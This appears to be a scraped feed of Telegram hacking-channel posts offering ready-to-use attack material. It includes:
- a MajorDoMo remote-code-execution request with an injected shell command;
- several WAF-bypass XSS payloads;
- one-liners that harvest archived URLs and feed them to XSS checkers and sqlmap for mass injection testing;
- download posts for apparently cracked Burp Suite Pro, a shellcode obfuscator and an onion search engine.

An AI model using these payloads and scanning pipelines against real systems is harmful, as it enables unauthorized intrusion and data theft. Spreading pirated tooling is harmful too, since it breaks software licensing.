xss oneliner command

echo "testphp.vulnweb.com" | waybackurls | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|icon|pdf|svg|txt|js)" | urldedupe -s | grep -IE "[?].*[&]?" | grep "=" | unew -p | pvreplace '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' | xsschecker -match '<sCript>confirm(1)</sCript>, <script>confirm(1)</script>' -vuln

⬇️ Download ( Tools )
πŸ”’ BugCod3 ( ZIP )
πŸ”’ LearnExploit ( BOT )

#XSS #BugBounty #Oneliner #Tips
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘ Burpsuite Pro πŸ‘

πŸ”₯ v2024.3.1

πŸ”” BurpBountyPro_v2.8.0 βž•

πŸ“‚ README (en+ru) included, plz read it before run BS.

πŸ”Ό Run this version With Java SE JDK 22

⬇️ Download

#Burpsuite #Pro #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
CVE-2024-31497: Critical PuTTY Vulnerability Exposes Private Keys

Link

#cve
β€”β€”β€”β€”β€”β€”β€Œ
0Day.Today
@LearnExploit
@Tech_Army
ΫŒΩ‡ Ψ³Ψ±Ϊ† Ψ§Ω†Ψ¬ΫŒΩ† Ψ¬Ψ§Ω„Ψ¨ Ϊ©Ω‡ Ω…ΫŒΨͺΩˆΩ†ΫŒΩ† Ψͺوش Ω…Ψ«Ω„ Ϊ―ΩˆΪ―Ω„ رایΨͺ Ψ§ΩΎ Ω‡Ψ§ و ΩΎΫŒΩ„ΩˆΨ― Ω‡Ψ§ و .... رو پیدا Ϊ©Ω†ΫŒΨ― πŸ‘Œ

Link

#writeup #ΩΎΫŒΨ΄Ω†Ω‡Ψ§Ψ―ΫŒ
β€”β€”β€”β€”β€”β€”β€Œ
0Day.Today
@LearnExploit
@Tech_Army
SQLMap from Waybackurls ⚑️

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

#sql #sql_injection #tip
β€”β€”β€”β€”β€”β€”β€Œ
0Day.Today
@LearnExploit
@Tech_Army
VormWeb - Tor search engine ⚑️

volkancfgpi4c7ghph6id2t7vcntenuly66qjt6oedwtjmyj4tkk5oqd.onion

#Tor #Darkweb
β€”β€”β€”β€”β€”β€”β€Œ
0Day.Today
@LearnExploit
@Tech_Army
MajorDoMo thumb RCE

GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23 %3B HTTP/1.1``

#rce #Poc #Exploit
β€”β€”β€”β€”β€”β€”β€Œ
0Day.Today
@LearnExploit
@Tech_Army
Extract IPS From list of domains and then you can conduct your FUZZ/Manually check them for SDE /BAC , Ports , ..etc

grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'

#Fuzz #tip
β€”β€”β€”β€”β€”β€”β€Œ
0Day.Today
@LearnExploit
@Tech_Army
Do you know that sqlmap has its own crawler? Run in the background easily:

sqlmap -u 'https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12

#sql #sql_injection
β€”β€”β€”β€”β€”β€”β€Œ
0Day.Today
@LearnExploit
@Tech_Army
Stored Xss payload πŸ”₯

Payload for bypass waf:

<Img Src=OnXSS OnError=confirm("@Learnexploit")>

#xss #Bypass #WAF #Payload
β€”β€”β€”β€”β€”β€”β€Œ
0Day.Today
@LearnExploit
@Tech_Army
Xss Payload πŸ’Ž

j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:console.log(location)

#xss #Payload
β€”β€”β€”β€”β€”β€”β€Œ
0Day.Today
@LearnExploit
@Tech_Army
XSS could be be triggers in url itself, no need for parameter injection ⚑️

Payloads:


%3Csvg%20onload=alert(%22@Learnexploit88%22)%3E


%3Cimg%20src=x%20onerror=alert(%22@Learnexploit%22)%3E

#Xss #Payload
β€”β€”β€”β€”β€”β€”β€Œ
0Day.Today
@LearnExploit
@Tech_Army
🌐 Ominis OSINT: Secure Web-Search 🌐

πŸ“Š Features:
πŸš€ Enhanced User Interface: Enjoy a redesigned interface for a seamless experience, suitable for both novice and experienced users.
πŸ”Ž Expanded Digital Reconnaissance: Conduct thorough investigations with advanced tools to gather and analyze publicly available information from diverse online sources.
πŸ’‘ Threading Optimization: Experience faster execution times with optimized threading, improving efficiency and reducing waiting periods during username searches.
πŸ“Š Detailed Results: Gain comprehensive insights from search results, including detailed information extracted from various sources such as social profiles, mentions, and potential forum links.
βš™οΈ Proxy Validation: The tool validates proxies for secure and efficient web requests, ensuring anonymity and privacy during the search process. This feature enhances the reliability of the search results by utilizing a pool of validated proxies, mitigating the risk of IP blocking and ensuring seamless execution of the search queries.
πŸ•΅οΈβ€β™‚οΈ Human-like Behavior Mimicking: To mimic human-like behavior and avoid detection by anti-bot mechanisms, the tool randomizes user agents for each request. This helps in making the requests appear more natural and reduces the likelihood of being flagged as automated activity.
πŸ›‘ Randomized Proxy Agents: In addition to proxy validation, the tool utilizes randomized proxy agents for each request, further enhancing user anonymity. By rotating through a pool of proxies, the tool reduces the chances of being tracked or identified by websites, thus safeguarding user privacy throughout the reconnaissance process.
πŸ” Username Search: Searches a list of URLs for a specific username. Utilizes threading for parallel execution. Provides detailed results with URL and HTTP status code.

πŸ”Ό Installation:
cd Ominis-Osint
pip install -r requirements.txt
python3 Ominis.py


😸 Github

⬇️ Download
πŸ”’ BugCod3

#Python #Osint #Search #Engin #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
Real fucking shellcode encryptor & obfuscator tool

Github

#tools #shellcode
β€”β€”β€”β€”β€”β€”β€Œ
0Day.Today
@LearnExploit
@Tech_Army
πŸ‘ Burpsuite Pro πŸ‘

πŸ”₯ v2024.3.1.2

πŸ”” BurpBountyPro_v2.8.0 βž•

πŸ“‚ README (en+ru) included, plz read it before run BS.

πŸ”Ό Run this version With Java SE JDK 22

⬇️ Download
πŸ”’ 311138

#Burpsuite #Pro #Tools
βž–βž–βž–βž–βž–βž–βž–βž–βž–βž–
πŸ“£ T.me/BugCod3
πŸ“£ T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from #Private
πŸ“£ Ψ¨Ψ§ Ψ§ΩΨ²ΩˆΨ―Ω† Ψ§ΫŒΩ† ΩΎΩˆΨ΄Ω‡ Ψ¨Ω‡ ΨͺΩ„Ϊ―Ψ±Ψ§Ω…ΨͺΩˆΩ† Ψ¨Ω‡ ΨͺΩ…Ψ§Ω… Ϊ†Ω†Ω„ Ω‡Ψ§ΫŒ Ψ’Ω…ΩˆΨ²Ψ΄ΫŒ و Ϊ©Ψ³Ψ¨ Ψ―Ψ±Ψ’Ω…Ψ― ΨͺΩ„Ϊ―Ψ±Ψ§Ω… Ψ¨Ω‡ ءورΨͺ یکجا Ψ―Ψ³Ψͺرسی Ψ―Ψ§Ψ΄ΨͺΩ‡ باشید و #Ϊ©Ψ³Ψ¨_و_Ϊ©Ψ§Ψ±ΨͺΩˆΩ†Ωˆ شروع Ϊ©Ω†ΫŒΨ― πŸ’΅

https://www.tg-me.com/addlist/_RIe0AhS4NsxZWJk

فقط Ψ¨Ψ§ ΫŒΩ‡ Ϊ©Ω„ΫŒΪ© و Ψ¨Ψ―ΩˆΩ† Ω‡ΫŒΪ†Ϊ―ΩˆΩ†Ω‡ Ω‡Ψ²ΫŒΩ†Ω‡  عآو شید و Ψ§Ψ² Ϊ©Ψ§Ω†Ψ§Ω„Ω‡Ψ§ Ω„Ψ°Ψͺ Ψ¨Ψ¨Ψ±ΫŒΨ―βœ”οΈ
Please open Telegram to view this post
VIEW IN TELEGRAM
2024/04/30 01:07:24
Back to Top
HTML Embed Code: